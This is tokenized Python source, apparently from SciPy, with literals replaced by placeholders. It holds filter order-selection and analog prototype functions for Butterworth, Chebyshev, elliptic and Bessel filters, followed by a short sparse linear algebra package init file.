fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , <EOL> '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( log10 ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) / ( <NUM_LIT:2> * log10 ( nat ) ) ) ) <EOL> try : <EOL> W0 = ( GPASS - <NUM_LIT:1.0> ) ** ( - <NUM_LIT:1.0> / ( <NUM_LIT> * ord ) ) <EOL> except ZeroDivisionError : <EOL> W0 = <NUM_LIT:1.0> <EOL> print ( "<STR_LIT>" ) <EOL> if filter_type == <NUM_LIT:1> : <EOL> WN = W0 * passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> WN = passb / W0 <EOL> elif filter_type == <NUM_LIT:3> : <EOL> WN = numpy . zeros ( <NUM_LIT:2> , float ) <EOL> discr = sqrt ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> + <EOL> <NUM_LIT:4> * W0 ** <NUM_LIT:2> * passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) <EOL> WN [ <NUM_LIT:0> ] = ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) + discr ) / ( <NUM_LIT:2> * W0 ) <EOL> WN [ <NUM_LIT:1> ] = ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) - discr ) / ( <NUM_LIT:2> * W0 ) <EOL> WN = numpy . sort ( abs ( WN ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> W0 = numpy . 
array ( [ - W0 , W0 ] , float ) <EOL> WN = ( - W0 * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) / <NUM_LIT> + <EOL> sqrt ( W0 ** <NUM_LIT:2> / <NUM_LIT> * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> + <EOL> passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> WN = numpy . sort ( abs ( WN ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % filter_type ) <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( WN ) <EOL> else : <EOL> wn = WN <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def cheb1ord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> if wp [ <NUM_LIT:0> ] < ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> else : <EOL> filter_type += <NUM_LIT:2> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . 
fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / <EOL> arccosh ( nat ) ) ) <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( passb ) <EOL> else : <EOL> wn = passb <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def cheb2ord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> if wp [ <NUM_LIT:0> ] < ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> else : <EOL> filter_type += <NUM_LIT:2> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . 
fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> ord = int ( ceil ( arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / <EOL> arccosh ( nat ) ) ) <EOL> new_freq = cosh ( <NUM_LIT:1.0> / ord * arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) ) <EOL> new_freq = <NUM_LIT:1.0> / new_freq <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = passb / new_freq <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb * new_freq <EOL> elif filter_type == <NUM_LIT:3> : <EOL> nat = numpy . zeros ( <NUM_LIT:2> , float ) <EOL> nat [ <NUM_LIT:0> ] = ( new_freq / <NUM_LIT> * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) + <EOL> sqrt ( new_freq ** <NUM_LIT:2> * ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> / <NUM_LIT> + <EOL> passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] ) ) <EOL> nat [ <NUM_LIT:1> ] = passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] / nat [ <NUM_LIT:0> ] <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = numpy . 
zeros ( <NUM_LIT:2> , float ) <EOL> nat [ <NUM_LIT:0> ] = ( <NUM_LIT:1.0> / ( <NUM_LIT> * new_freq ) * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) + <EOL> sqrt ( ( passb [ <NUM_LIT:1> ] - passb [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> / ( <NUM_LIT> * new_freq ** <NUM_LIT:2> ) + <EOL> passb [ <NUM_LIT:1> ] * passb [ <NUM_LIT:0> ] ) ) <EOL> nat [ <NUM_LIT:1> ] = passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] / nat [ <NUM_LIT:0> ] <EOL> if not analog : <EOL> wn = ( <NUM_LIT> / pi ) * arctan ( nat ) <EOL> else : <EOL> wn = nat <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def ellipord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> filter_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . 
fminbound ( band_stop_obj , stopb [ <NUM_LIT:1> ] + <NUM_LIT> , passb [ <NUM_LIT:1> ] , <EOL> args = ( <NUM_LIT:1> , passb , stopb , gpass , gstop , '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:1> ] = wp1 <EOL> nat = ( ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) / <EOL> ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) ) <EOL> elif filter_type == <NUM_LIT:4> : <EOL> nat = ( ( stopb ** <NUM_LIT:2> - passb [ <NUM_LIT:0> ] * passb [ <NUM_LIT:1> ] ) / <EOL> ( stopb * ( passb [ <NUM_LIT:0> ] - passb [ <NUM_LIT:1> ] ) ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gstop ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gpass ) <EOL> arg1 = sqrt ( ( GPASS - <NUM_LIT:1.0> ) / ( GSTOP - <NUM_LIT:1.0> ) ) <EOL> arg0 = <NUM_LIT:1.0> / nat <EOL> d0 = special . ellipk ( [ arg0 ** <NUM_LIT:2> , <NUM_LIT:1> - arg0 ** <NUM_LIT:2> ] ) <EOL> d1 = special . ellipk ( [ arg1 ** <NUM_LIT:2> , <NUM_LIT:1> - arg1 ** <NUM_LIT:2> ] ) <EOL> ord = int ( ceil ( d0 [ <NUM_LIT:0> ] * d1 [ <NUM_LIT:1> ] / ( d0 [ <NUM_LIT:1> ] * d1 [ <NUM_LIT:0> ] ) ) ) <EOL> if not analog : <EOL> wn = arctan ( passb ) * <NUM_LIT> / pi <EOL> else : <EOL> wn = passb <EOL> if len ( wn ) == <NUM_LIT:1> : <EOL> wn = wn [ <NUM_LIT:0> ] <EOL> return ord , wn <EOL> def buttap ( N ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> z = numpy . array ( [ ] ) <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> p = - numpy . exp ( <NUM_LIT> * pi * m / ( <NUM_LIT:2> * N ) ) <EOL> k = <NUM_LIT:1> <EOL> return z , p , k <EOL> def cheb1ap ( N , rp ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:10> ** ( - rp / <NUM_LIT:20> ) <EOL> z = numpy . array ( [ ] ) <EOL> eps = numpy . 
sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1.0> ) <EOL> mu = <NUM_LIT:1.0> / N * arcsinh ( <NUM_LIT:1> / eps ) <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> theta = pi * m / ( <NUM_LIT:2> * N ) <EOL> p = - sinh ( mu + <NUM_LIT> * theta ) <EOL> k = numpy . prod ( - p , axis = <NUM_LIT:0> ) . real <EOL> if N % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> k = k / sqrt ( ( <NUM_LIT:1> + eps * eps ) ) <EOL> return z , p , k <EOL> def cheb2ap ( N , rs ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:1> <EOL> de = <NUM_LIT:1.0> / sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rs ) - <NUM_LIT:1> ) <EOL> mu = arcsinh ( <NUM_LIT:1.0> / de ) / N <EOL> if N % <NUM_LIT:2> : <EOL> m = numpy . concatenate ( ( numpy . arange ( - N + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) , <EOL> numpy . arange ( <NUM_LIT:2> , N , <NUM_LIT:2> ) ) ) <EOL> else : <EOL> m = numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) <EOL> z = - conjugate ( <NUM_LIT> / sin ( m * pi / ( <NUM_LIT> * N ) ) ) <EOL> p = - exp ( <NUM_LIT> * pi * numpy . arange ( - N + <NUM_LIT:1> , N , <NUM_LIT:2> ) / ( <NUM_LIT:2> * N ) ) <EOL> p = sinh ( mu ) * p . real + <NUM_LIT> * cosh ( mu ) * p . imag <EOL> p = <NUM_LIT:1.0> / p <EOL> k = ( numpy . prod ( - p , axis = <NUM_LIT:0> ) / numpy . prod ( - z , axis = <NUM_LIT:0> ) ) . real <EOL> return z , p , k <EOL> EPSILON = <NUM_LIT> <EOL> def _vratio ( u , ineps , mp ) : <EOL> [ s , c , d , phi ] = special . ellipj ( u , mp ) <EOL> ret = abs ( ineps - s / c ) <EOL> return ret <EOL> def _kratio ( m , k_ratio ) : <EOL> m = float ( m ) <EOL> if m < <NUM_LIT:0> : <EOL> m = <NUM_LIT:0.0> <EOL> if m > <NUM_LIT:1> : <EOL> m = <NUM_LIT:1.0> <EOL> if abs ( m ) > EPSILON and ( abs ( m ) + EPSILON ) < <NUM_LIT:1> : <EOL> k = special . 
ellipk ( [ m , <NUM_LIT:1> - m ] ) <EOL> r = k [ <NUM_LIT:0> ] / k [ <NUM_LIT:1> ] - k_ratio <EOL> elif abs ( m ) > EPSILON : <EOL> r = - k_ratio <EOL> else : <EOL> r = <NUM_LIT> <EOL> return abs ( r ) <EOL> def ellipap ( N , rp , rs ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif N == <NUM_LIT:0> : <EOL> return numpy . array ( [ ] ) , numpy . array ( [ ] ) , <NUM_LIT:10> ** ( - rp / <NUM_LIT:20> ) <EOL> elif N == <NUM_LIT:1> : <EOL> p = - sqrt ( <NUM_LIT:1.0> / ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1.0> ) ) <EOL> k = - p <EOL> z = [ ] <EOL> return asarray ( z ) , asarray ( p ) , k <EOL> eps = numpy . sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rp ) - <NUM_LIT:1> ) <EOL> ck1 = eps / numpy . sqrt ( <NUM_LIT:10> ** ( <NUM_LIT:0.1> * rs ) - <NUM_LIT:1> ) <EOL> ck1p = numpy . sqrt ( <NUM_LIT:1> - ck1 * ck1 ) <EOL> if ck1p == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> val = special . ellipk ( [ ck1 * ck1 , ck1p * ck1p ] ) <EOL> if abs ( <NUM_LIT:1> - ck1p * ck1p ) < EPSILON : <EOL> krat = <NUM_LIT:0> <EOL> else : <EOL> krat = N * val [ <NUM_LIT:0> ] / val [ <NUM_LIT:1> ] <EOL> m = optimize . fmin ( _kratio , [ <NUM_LIT:0.5> ] , args = ( krat , ) , maxfun = <NUM_LIT> , maxiter = <NUM_LIT> , <EOL> disp = <NUM_LIT:0> ) <EOL> if m < <NUM_LIT:0> or m > <NUM_LIT:1> : <EOL> m = optimize . fminbound ( _kratio , <NUM_LIT:0> , <NUM_LIT:1> , args = ( krat , ) , maxfun = <NUM_LIT> , <EOL> maxiter = <NUM_LIT> , disp = <NUM_LIT:0> ) <EOL> capk = special . ellipk ( m ) <EOL> j = numpy . arange ( <NUM_LIT:1> - N % <NUM_LIT:2> , N , <NUM_LIT:2> ) <EOL> jj = len ( j ) <EOL> [ s , c , d , phi ] = special . ellipj ( j * capk / N , m * numpy . ones ( jj ) ) <EOL> snew = numpy . compress ( abs ( s ) > EPSILON , s , axis = - <NUM_LIT:1> ) <EOL> z = <NUM_LIT:1.0> / ( sqrt ( m ) * snew ) <EOL> z = <NUM_LIT> * z <EOL> z = numpy . concatenate ( ( z , conjugate ( z ) ) ) <EOL> r = optimize . 
fmin ( _vratio , special . ellipk ( m ) , args = ( <NUM_LIT:1.> / eps , ck1p * ck1p ) , <EOL> maxfun = <NUM_LIT> , maxiter = <NUM_LIT> , disp = <NUM_LIT:0> ) <EOL> v0 = capk * r / ( N * val [ <NUM_LIT:0> ] ) <EOL> [ sv , cv , dv , phi ] = special . ellipj ( v0 , <NUM_LIT:1> - m ) <EOL> p = - ( c * d * sv * cv + <NUM_LIT> * s * dv ) / ( <NUM_LIT:1> - ( d * sv ) ** <NUM_LIT> ) <EOL> if N % <NUM_LIT:2> : <EOL> newp = numpy . compress ( abs ( p . imag ) > EPSILON * <EOL> numpy . sqrt ( numpy . sum ( p * numpy . conjugate ( p ) , <EOL> axis = <NUM_LIT:0> ) . real ) , <EOL> p , axis = - <NUM_LIT:1> ) <EOL> p = numpy . concatenate ( ( p , conjugate ( newp ) ) ) <EOL> else : <EOL> p = numpy . concatenate ( ( p , conjugate ( p ) ) ) <EOL> k = ( numpy . prod ( - p , axis = <NUM_LIT:0> ) / numpy . prod ( - z , axis = <NUM_LIT:0> ) ) . real <EOL> if N % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> k = k / numpy . sqrt ( ( <NUM_LIT:1> + eps * eps ) ) <EOL> return z , p , k <EOL> def _bessel_poly ( n , reverse = False ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( n ) ) != n : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> n = int ( n ) <EOL> out = [ ] <EOL> for k in range ( n + <NUM_LIT:1> ) : <EOL> num = factorial ( <NUM_LIT:2> * n - k , exact = True ) <EOL> den = <NUM_LIT:2> ** ( n - k ) * ( factorial ( k , exact = True ) * <EOL> factorial ( n - k , exact = True ) ) <EOL> out . 
append ( num // den ) <EOL> if reverse : <EOL> return out [ : : - <NUM_LIT:1> ] <EOL> else : <EOL> return out <EOL> def _campos_zeros ( n ) : <EOL> """<STR_LIT>""" <EOL> if n == <NUM_LIT:1> : <EOL> return asarray ( [ - <NUM_LIT:1> + <NUM_LIT> ] ) <EOL> s = npp_polyval ( n , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:3> , <NUM_LIT:1> ] ) <EOL> b3 = npp_polyval ( n , [ <NUM_LIT:16> , - <NUM_LIT:8> ] ) / s <EOL> b2 = npp_polyval ( n , [ - <NUM_LIT> , - <NUM_LIT:12> , <NUM_LIT:12> ] ) / s <EOL> b1 = npp_polyval ( n , [ <NUM_LIT:8> , <NUM_LIT> , - <NUM_LIT:12> , - <NUM_LIT:2> ] ) / s <EOL> b0 = npp_polyval ( n , [ <NUM_LIT:0> , - <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:5> , - <NUM_LIT:1> ] ) / s <EOL> r = npp_polyval ( n , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> a1 = npp_polyval ( n , [ - <NUM_LIT:6> , - <NUM_LIT:6> ] ) / r <EOL> a2 = <NUM_LIT:6> / r <EOL> k = np . arange ( <NUM_LIT:1> , n + <NUM_LIT:1> ) <EOL> x = npp_polyval ( k , [ <NUM_LIT:0> , a1 , a2 ] ) <EOL> y = npp_polyval ( k , [ b0 , b1 , b2 , b3 ] ) <EOL> return x + <NUM_LIT> * y <EOL> def _aberth ( f , fp , x0 , tol = <NUM_LIT> , maxiter = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> N = len ( x0 ) <EOL> x = array ( x0 , complex ) <EOL> beta = np . empty_like ( x0 ) <EOL> for iteration in range ( maxiter ) : <EOL> alpha = - f ( x ) / fp ( x ) <EOL> for k in range ( N ) : <EOL> beta [ k ] = np . sum ( <NUM_LIT:1> / ( x [ k ] - x [ k + <NUM_LIT:1> : ] ) ) <EOL> beta [ k ] += np . sum ( <NUM_LIT:1> / ( x [ k ] - x [ : k ] ) ) <EOL> x += alpha / ( <NUM_LIT:1> + alpha * beta ) <EOL> if not all ( np . isfinite ( x ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if all ( abs ( alpha ) <= tol ) : <EOL> break <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> return x <EOL> def _bessel_zeros ( N ) : <EOL> """<STR_LIT>""" <EOL> if N == <NUM_LIT:0> : <EOL> return asarray ( [ ] ) <EOL> x0 = _campos_zeros ( N ) <EOL> def f ( x ) : <EOL> return special . 
kve ( N + <NUM_LIT:0.5> , <NUM_LIT:1> / x ) <EOL> def fp ( x ) : <EOL> return ( special . kve ( N - <NUM_LIT:0.5> , <NUM_LIT:1> / x ) / ( <NUM_LIT:2> * x ** <NUM_LIT:2> ) - <EOL> special . kve ( N + <NUM_LIT:0.5> , <NUM_LIT:1> / x ) / ( x ** <NUM_LIT:2> ) + <EOL> special . kve ( N + <NUM_LIT> , <NUM_LIT:1> / x ) / ( <NUM_LIT:2> * x ** <NUM_LIT:2> ) ) <EOL> x = _aberth ( f , fp , x0 ) <EOL> for i in range ( len ( x ) ) : <EOL> x [ i ] = optimize . newton ( f , x [ i ] , fp , tol = <NUM_LIT> ) <EOL> x = np . mean ( ( x , x [ : : - <NUM_LIT:1> ] . conj ( ) ) , <NUM_LIT:0> ) <EOL> if abs ( np . sum ( x ) + <NUM_LIT:1> ) > <NUM_LIT> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return x <EOL> def _norm_factor ( a ) : <EOL> """<STR_LIT>""" <EOL> a = asarray ( a , dtype = float ) <EOL> def G ( w ) : <EOL> """<STR_LIT>""" <EOL> return abs ( a [ - <NUM_LIT:1> ] / npp_polyval ( <NUM_LIT> * w , a [ : : - <NUM_LIT:1> ] ) ) <EOL> def cutoff ( w ) : <EOL> """<STR_LIT>""" <EOL> return G ( w ) - <NUM_LIT:1> / np . sqrt ( <NUM_LIT:2> ) <EOL> return optimize . newton ( cutoff , <NUM_LIT> ) <EOL> def besselap ( N , norm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if abs ( int ( N ) ) != N : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if N == <NUM_LIT:0> : <EOL> p = [ ] <EOL> k = <NUM_LIT:1> <EOL> else : <EOL> p = <NUM_LIT:1> / _bessel_zeros ( N ) <EOL> a = _bessel_poly ( N , reverse = True ) <EOL> if norm == '<STR_LIT>' : <EOL> k = a [ - <NUM_LIT:1> ] <EOL> elif norm == '<STR_LIT>' : <EOL> p *= <NUM_LIT:10> ** ( - math . 
log10 ( a [ - <NUM_LIT:1> ] ) / N ) <EOL> k = <NUM_LIT:1> <EOL> elif norm == '<STR_LIT>' : <EOL> norm_factor = _norm_factor ( a ) <EOL> p /= norm_factor <EOL> k = norm_factor ** - N * a [ - <NUM_LIT:1> ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return asarray ( [ ] ) , asarray ( p , dtype = complex ) , float ( k ) <EOL> filter_dict = { '<STR_LIT>' : [ buttap , buttord ] , <EOL> '<STR_LIT>' : [ buttap , buttord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ ellipap , ellipord ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ besselap ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb1ap , cheb1ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> '<STR_LIT>' : [ cheb2ap , cheb2ord ] , <EOL> } <EOL> band_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:h>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> bessel_norms = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> from . isolve import * <EOL> from . dsolve import * <EOL> from . interface import * <EOL> from . eigen import * <EOL> from . matfuncs import * <EOL> from . _onenormest import * <EOL> from . _norm import * <EOL> from . _expm_multiply import * <EOL> __all__ = [ s for s in dir ( ) if not s . startswith ( '<STR_LIT:_>' ) ] <EOL> from numpy . testing import Tester <EOL> test = Tester ( ) . test <EOL> bench = Tester ( ) . bench </s>
